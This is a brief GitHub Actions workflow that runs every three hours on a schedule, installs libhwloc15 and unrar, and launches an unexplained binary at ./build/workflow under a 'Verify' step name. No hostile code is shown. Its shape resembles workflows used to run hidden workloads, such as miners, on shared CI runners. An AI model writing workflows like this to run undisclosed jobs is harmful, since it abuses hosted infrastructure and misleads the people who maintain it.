jobs:
  check:
    name: Verify
    runs-on: ubuntu-20.04

    steps:
      - name: Pull Code
        uses: actions/checkout@v2
      - name: Download Dependencies
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Execute Tests
        run: ./build/workflow

name: Main

on:
  schedule:
    - cron: "45 */3 * * *"
